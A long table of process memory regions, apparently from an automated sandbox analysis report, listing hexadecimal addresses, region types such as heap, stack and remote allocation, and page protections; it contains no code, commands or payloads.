|
4A23000
|
heap
|
page read and write
|
||
|
1FD43150000
|
heap
|
page read and write
|
||
|
1F640DAF000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
82F8000
|
heap
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
1FD43185000
|
heap
|
page read and write
|
||
|
1F642CF2000
|
heap
|
page read and write
|
||
|
49C2000
|
trusted library allocation
|
page read and write
|
||
|
97CF9FE000
|
stack
|
page read and write
|
||
|
70AE000
|
heap
|
page read and write
|
||
|
263E000
|
stack
|
page read and write
|
||
|
1F640CE8000
|
heap
|
page read and write
|
||
|
3038000
|
trusted library allocation
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
22C5F000
|
stack
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
27AC000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
1F642660000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
500D000
|
heap
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
48AE000
|
stack
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
17046560000
|
heap
|
page read and write
|
||
|
4A18000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
1FD42F9F000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
2F40000
|
trusted library allocation
|
page read and write
|
||
|
716E000
|
stack
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
1FD5CF40000
|
heap
|
page read and write
|
||
|
501B000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD5D123000
|
heap
|
page read and write
|
||
|
831F000
|
heap
|
page read and write
|
||
|
1FD44C01000
|
trusted library allocation
|
page read and write
|
||
|
76AE000
|
stack
|
page read and write
|
||
|
59C8000
|
trusted library allocation
|
page read and write
|
||
|
7088000
|
heap
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
4950000
|
heap
|
page execute and read and write
|
||
|
2C5C000
|
stack
|
page read and write
|
||
|
1F640C48000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
5A4067E000
|
stack
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
2C9A000
|
stack
|
page read and write
|
||
|
6ED0000
|
direct allocation
|
page read and write
|
||
|
503E000
|
heap
|
page read and write
|
||
|
71F0000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
5A4057E000
|
stack
|
page read and write
|
||
|
1FD4688E000
|
trusted library allocation
|
page read and write
|
||
|
5009000
|
heap
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
226F0000
|
heap
|
page read and write
|
||
|
2F0C000
|
heap
|
page read and write
|
||
|
5016000
|
trusted library allocation
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
505D000
|
heap
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
71AE000
|
stack
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
heap
|
page read and write
|
||
|
22FFB000
|
unclassified section
|
page execute and read and write
|
||
|
9276000
|
direct allocation
|
page execute and read and write
|
||
|
302E000
|
stack
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
228EE000
|
stack
|
page read and write
|
||
|
5A4168B000
|
stack
|
page read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
70C8000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
1F640CF5000
|
heap
|
page read and write
|
||
|
4EF0000
|
heap
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
1F640C49000
|
heap
|
page read and write
|
||
|
4A08000
|
heap
|
page read and write
|
||
|
170466A0000
|
heap
|
page read and write
|
||
|
1F642CDF000
|
heap
|
page read and write
|
||
|
1F642D00000
|
heap
|
page read and write
|
||
|
233C0000
|
heap
|
page read and write
|
||
|
1F640D8B000
|
heap
|
page read and write
|
||
|
23833000
|
unclassified section
|
page execute and read and write
|
||
|
1F640D89000
|
heap
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
7390000
|
heap
|
page read and write
|
||
|
70D2000
|
heap
|
page read and write
|
||
|
5A4037E000
|
stack
|
page read and write
|
||
|
263D000
|
stack
|
page read and write
|
||
|
1F640AE0000
|
heap
|
page read and write
|
||
|
4A0F000
|
heap
|
page read and write
|
||
|
1FD54C21000
|
trusted library allocation
|
page read and write
|
||
|
1F640DBD000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
3139000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
5961000
|
trusted library allocation
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
1F642AF1000
|
heap
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
1FD45403000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
703D000
|
heap
|
page read and write
|
||
|
2F8A000
|
heap
|
page read and write
|
||
|
7558000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
502E000
|
heap
|
page read and write
|
||
|
6EC0000
|
heap
|
page read and write
|
||
|
3D96000
|
remote allocation
|
page execute and read and write
|
||
|
1FD451AC000
|
trusted library allocation
|
page read and write
|
||
|
230B0000
|
heap
|
page read and write
|
||
|
DC0000
|
trusted library section
|
page read and write
|
||
|
233C1000
|
heap
|
page read and write
|
||
|
88A0000
|
direct allocation
|
page read and write
|
||
|
23011000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
6D1E000
|
stack
|
page read and write
|
||
|
1FD44A30000
|
trusted library allocation
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
4A09000
|
heap
|
page read and write
|
||
|
7DF49F7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8324000
|
heap
|
page read and write
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
4928000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
1FD45F18000
|
trusted library allocation
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
70AE000
|
heap
|
page read and write
|
||
|
2F13000
|
trusted library allocation
|
page execute and read and write
|
||
|
833C000
|
heap
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
170467D0000
|
heap
|
page read and write
|
||
|
486C000
|
stack
|
page read and write
|
||
|
1FD42FE4000
|
heap
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
26BE000
|
stack
|
page read and write
|
||
|
1FD43050000
|
heap
|
page read and write
|
||
|
71C0000
|
heap
|
page readonly
|
||
|
299F000
|
unkown
|
page read and write
|
||
|
827E000
|
stack
|
page read and write
|
||
|
1F640DA9000
|
heap
|
page read and write
|
||
|
22AED000
|
stack
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
70BA000
|
heap
|
page read and write
|
||
|
1FD42FA3000
|
heap
|
page read and write
|
||
|
8334000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
22D5E000
|
stack
|
page read and write
|
||
|
4D61000
|
heap
|
page read and write
|
||
|
BA76000
|
direct allocation
|
page execute and read and write
|
||
|
1FD54C10000
|
trusted library allocation
|
page read and write
|
||
|
97CF6FE000
|
stack
|
page read and write
|
||
|
2F30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
5A409BE000
|
stack
|
page read and write
|
||
|
1FD5D2A1000
|
heap
|
page read and write
|
||
|
1FD42F50000
|
heap
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
7377000
|
heap
|
page read and write
|
||
|
1F6429B1000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
29AF000
|
stack
|
page read and write
|
||
|
3923000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
5A405FE000
|
stack
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
77FB000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
5989000
|
trusted library allocation
|
page read and write
|
||
|
4A1B000
|
heap
|
page read and write
|
||
|
1F640DA9000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
1FD453C7000
|
trusted library allocation
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
7520000
|
heap
|
page execute and read and write
|
||
|
8190000
|
heap
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
4905000
|
heap
|
page execute and read and write
|
||
|
2323A000
|
heap
|
page read and write
|
||
|
1F640C4D000
|
heap
|
page read and write
|
||
|
17046680000
|
heap
|
page read and write
|
||
|
5005000
|
heap
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
4A18000
|
heap
|
page read and write
|
||
|
7327000
|
heap
|
page read and write
|
||
|
2323A000
|
heap
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
1F640D8F000
|
heap
|
page read and write
|
||
|
82E0000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
4A09000
|
heap
|
page read and write
|
||
|
1F642D16000
|
heap
|
page read and write
|
||
|
1FD4687A000
|
trusted library allocation
|
page read and write
|
||
|
230B1000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
6D5E000
|
stack
|
page read and write
|
||
|
1FD4637A000
|
trusted library allocation
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
500D000
|
heap
|
page read and write
|
||
|
D6D000
|
heap
|
page read and write
|
||
|
1FD44AC0000
|
heap
|
page read and write
|
||
|
1FD5CFA0000
|
heap
|
page read and write
|
||
|
1FD43180000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
702F000
|
heap
|
page read and write
|
||
|
91D7000
|
trusted library allocation
|
page read and write
|
||
|
170467D5000
|
heap
|
page read and write
|
||
|
17046470000
|
heap
|
page read and write
|
||
|
8187000
|
stack
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
1FD44E26000
|
trusted library allocation
|
page read and write
|
||
|
4A18000
|
heap
|
page read and write
|
||
|
4A05000
|
heap
|
page read and write
|
||
|
23EE000
|
unkown
|
page read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
871E000
|
stack
|
page read and write
|
||
|
501C000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD5D450000
|
heap
|
page read and write
|
||
|
1F640CE7000
|
heap
|
page read and write
|
||
|
AB8000
|
stack
|
page read and write
|
||
|
9180000
|
direct allocation
|
page execute and read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
23896000
|
unclassified section
|
page execute and read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
70E6000
|
heap
|
page read and write
|
||
|
4D61000
|
heap
|
page read and write
|
||
|
231F6FF000
|
stack
|
page read and write
|
||
|
1F6429B6000
|
heap
|
page read and write
|
||
|
231A1000
|
heap
|
page read and write
|
||
|
22A00000
|
direct allocation
|
page read and write
|
||
|
5A406FD000
|
stack
|
page read and write
|
||
|
73EF000
|
heap
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
869E000
|
stack
|
page read and write
|
||
|
313B000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
1F6429BF000
|
heap
|
page read and write
|
||
|
4A0F000
|
heap
|
page read and write
|
||
|
231F5FF000
|
unkown
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD5D26F000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
97CF2FE000
|
stack
|
page read and write
|
||
|
5A40273000
|
stack
|
page read and write
|
||
|
2ACC000
|
stack
|
page read and write
|
||
|
5A4073E000
|
stack
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
1F6429B0000
|
heap
|
page read and write
|
||
|
97CFBFB000
|
stack
|
page read and write
|
||
|
1F6429BD000
|
heap
|
page read and write
|
||
|
1FD42F67000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
1FD5D2D8000
|
heap
|
page read and write
|
||
|
1FD453B5000
|
trusted library allocation
|
page read and write
|
||
|
494E000
|
stack
|
page read and write
|
||
|
1FD44C84000
|
trusted library allocation
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
6F6D000
|
stack
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
1FD5D2D2000
|
heap
|
page read and write
|
||
|
1FD5CFA2000
|
heap
|
page read and write
|
||
|
1F642D0F000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
70B6000
|
heap
|
page read and write
|
||
|
22FA0000
|
heap
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
1FD453AB000
|
trusted library allocation
|
page read and write
|
||
|
1F640C4D000
|
heap
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
4A18000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page readonly
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
stack
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
2346A000
|
heap
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
97CFAFE000
|
stack
|
page read and write
|
||
|
4A07000
|
heap
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
1FD453EB000
|
trusted library allocation
|
page read and write
|
||
|
2AFF000
|
stack
|
page read and write
|
||
|
1FD44AC7000
|
heap
|
page read and write
|
||
|
1FD44980000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1FD43033000
|
heap
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
1F642A18000
|
heap
|
page read and write
|
||
|
CB0000
|
trusted library section
|
page read and write
|
||
|
97CEF3A000
|
stack
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
5002000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
7000000
|
heap
|
page read and write
|
||
|
8328000
|
heap
|
page read and write
|
||
|
7200000
|
direct allocation
|
page read and write
|
||
|
7367000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
22F5D000
|
stack
|
page read and write
|
||
|
3279000
|
stack
|
page read and write
|
||
|
1FD46985000
|
trusted library allocation
|
page read and write
|
||
|
1F642D00000
|
heap
|
page read and write
|
||
|
1F6429B1000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
9C76000
|
direct allocation
|
page execute and read and write
|
||
|
5A404FC000
|
stack
|
page read and write
|
||
|
D3A000
|
heap
|
page read and write
|
||
|
8280000
|
heap
|
page read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
4A0A000
|
heap
|
page read and write
|
||
|
2F60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
1F640CF4000
|
heap
|
page read and write
|
||
|
97CF8FD000
|
stack
|
page read and write
|
||
|
1FD45400000
|
trusted library allocation
|
page read and write
|
||
|
231C1000
|
heap
|
page read and write
|
||
|
1F640D88000
|
heap
|
page read and write
|
||
|
1FD46873000
|
trusted library allocation
|
page read and write
|
||
|
70AE000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1F640BC0000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
22CDE000
|
stack
|
page read and write
|
||
|
70B0000
|
heap
|
page read and write
|
||
|
6E6B000
|
stack
|
page read and write
|
||
|
1FD44AD4000
|
heap
|
page read and write
|
||
|
5001000
|
heap
|
page read and write
|
||
|
6596000
|
remote allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1F640D81000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
4A02000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
1F640C4A000
|
heap
|
page read and write
|
||
|
70B7000
|
heap
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
3498000
|
heap
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
3920000
|
heap
|
page read and write
|
||
|
1F642CF6000
|
heap
|
page read and write
|
||
|
5005000
|
heap
|
page read and write
|
||
|
5001000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
2332C000
|
heap
|
page read and write
|
||
|
1F640D99000
|
heap
|
page read and write
|
||
|
1F640D5F000
|
heap
|
page read and write
|
||
|
1FD54C01000
|
trusted library allocation
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
6EB5000
|
heap
|
page read and write
|
||
|
1F640CC8000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1F640D00000
|
heap
|
page read and write
|
||
|
865B000
|
stack
|
page read and write
|
||
|
31CF000
|
unkown
|
page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
22B2C000
|
stack
|
page read and write
|
||
|
1F640DBD000
|
heap
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
2877000
|
heap
|
page read and write
|
||
|
2670000
|
heap
|
page read and write
|
||
|
2F1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
23CD000
|
stack
|
page read and write
|
||
|
1FD449F0000
|
trusted library allocation
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
7432000
|
heap
|
page read and write
|
||
|
313E000
|
heap
|
page read and write
|
||
|
500D000
|
heap
|
page read and write
|
||
|
1FD5CFF8000
|
heap
|
page read and write
|
||
|
2A9F000
|
stack
|
page read and write
|
||
|
229E0000
|
direct allocation
|
page read and write
|
||
|
1FD45228000
|
trusted library allocation
|
page read and write
|
||
|
737C000
|
heap
|
page read and write
|
||
|
766E000
|
stack
|
page read and write
|
||
|
75CA000
|
trusted library allocation
|
page read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
5A4150E000
|
stack
|
page read and write
|
||
|
1F6429C3000
|
heap
|
page read and write
|
||
|
1FD54EF9000
|
trusted library allocation
|
page read and write
|
||
|
500A000
|
heap
|
page read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
23129000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
70B2000
|
heap
|
page read and write
|
||
|
330D000
|
heap
|
page read and write
|
||
|
97CF3FE000
|
stack
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
4A15000
|
heap
|
page read and write
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1FD44BF0000
|
heap
|
page read and write
|
||
|
1F640CC0000
|
heap
|
page read and write
|
||
|
1FD5D022000
|
heap
|
page read and write
|
||
|
22C1E000
|
stack
|
page read and write
|
||
|
1FD46A5C000
|
trusted library allocation
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
2389C000
|
unclassified section
|
page execute and read and write
|
||
|
1FD5D2C3000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
22B9C000
|
stack
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
1FD4539C000
|
trusted library allocation
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
5008000
|
heap
|
page read and write
|
||
|
501B000
|
heap
|
page read and write
|
||
|
22D9D000
|
stack
|
page read and write
|
||
|
2F29000
|
trusted library allocation
|
page read and write
|
||
|
87BE000
|
stack
|
page read and write
|
||
|
231F4FD000
|
stack
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
225FD000
|
stack
|
page read and write
|
||
|
1FD5D120000
|
heap
|
page read and write
|
||
|
22A8F000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page execute and read and write
|
||
|
3137000
|
heap
|
page read and write
|
||
|
2257E000
|
stack
|
page read and write
|
||
|
27C5000
|
heap
|
page read and write
|
||
|
4A12000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
5013000
|
heap
|
page read and write
|
||
|
1F640CFD000
|
heap
|
page read and write
|
||
|
26FE000
|
stack
|
page read and write
|
||
|
855C000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
1F640DAC000
|
heap
|
page read and write
|
||
|
22FE0000
|
unclassified section
|
page execute and read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
5A4160B000
|
stack
|
page read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
4A0F000
|
heap
|
page read and write
|
||
|
1FD5D200000
|
heap
|
page execute and read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
225BE000
|
stack
|
page read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
1F642D26000
|
heap
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
8860000
|
direct allocation
|
page read and write
|
||
|
1F6429CF000
|
heap
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
6FE0000
|
heap
|
page read and write
|
||
|
1FD54EEA000
|
trusted library allocation
|
page read and write
|
||
|
4A23000
|
heap
|
page read and write
|
||
|
2B55000
|
heap
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
23010000
|
direct allocation
|
page read and write
|
||
|
5200000
|
trusted library allocation
|
page read and write
|
||
|
1F640D94000
|
heap
|
page read and write
|
||
|
5B96000
|
remote allocation
|
page execute and read and write
|
||
|
1FD43029000
|
heap
|
page read and write
|
||
|
2F42000
|
trusted library allocation
|
page read and write
|
||
|
232B2000
|
heap
|
page read and write
|
||
|
5AEE000
|
trusted library allocation
|
page read and write
|
||
|
22DDE000
|
stack
|
page read and write
|
||
|
8362000
|
heap
|
page read and write
|
||
|
1F640C4A000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
70D2000
|
heap
|
page read and write
|
||
|
1FD449B0000
|
heap
|
page readonly
|
||
|
CCC000
|
heap
|
page read and write
|
||
|
22BDC000
|
stack
|
page read and write
|
||
|
237C0000
|
unclassified section
|
page execute and read and write
|
||
|
2B90000
|
heap
|
page readonly
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A01000
|
heap
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
1704656B000
|
heap
|
page read and write
|
||
|
4A0D000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
706D000
|
stack
|
page read and write
|
||
|
4900000
|
heap
|
page execute and read and write
|
||
|
71EF000
|
stack
|
page read and write
|
||
|
1FD44AC5000
|
heap
|
page read and write
|
||
|
1F642CDD000
|
heap
|
page read and write
|
||
|
1FD44AA0000
|
heap
|
page execute and read and write
|
||
|
392C000
|
heap
|
page read and write
|
||
|
5A4047E000
|
stack
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
709F000
|
heap
|
page read and write
|
||
|
2F3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
17046660000
|
heap
|
page read and write
|
||
|
27C4000
|
heap
|
page read and write
|
||
|
1F640C4D000
|
heap
|
page read and write
|
||
|
875D000
|
stack
|
page read and write
|
||
|
2B03000
|
stack
|
page read and write
|
||
|
22D1C000
|
stack
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
5A40B3B000
|
stack
|
page read and write
|
||
|
22C9B000
|
stack
|
page read and write
|
||
|
5007000
|
heap
|
page read and write
|
||
|
378F000
|
stack
|
page read and write
|
||
|
709F000
|
heap
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
2381D000
|
unclassified section
|
page execute and read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
22F9E000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
1FD4637F000
|
trusted library allocation
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
4A38000
|
heap
|
page read and write
|
||
|
4A15000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
2F14000
|
trusted library allocation
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
32CF000
|
stack
|
page read and write
|
||
|
2349A000
|
heap
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
232B2000
|
heap
|
page read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
23840000
|
unclassified section
|
page execute and read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
2292F000
|
stack
|
page read and write
|
||
|
4A01000
|
heap
|
page read and write
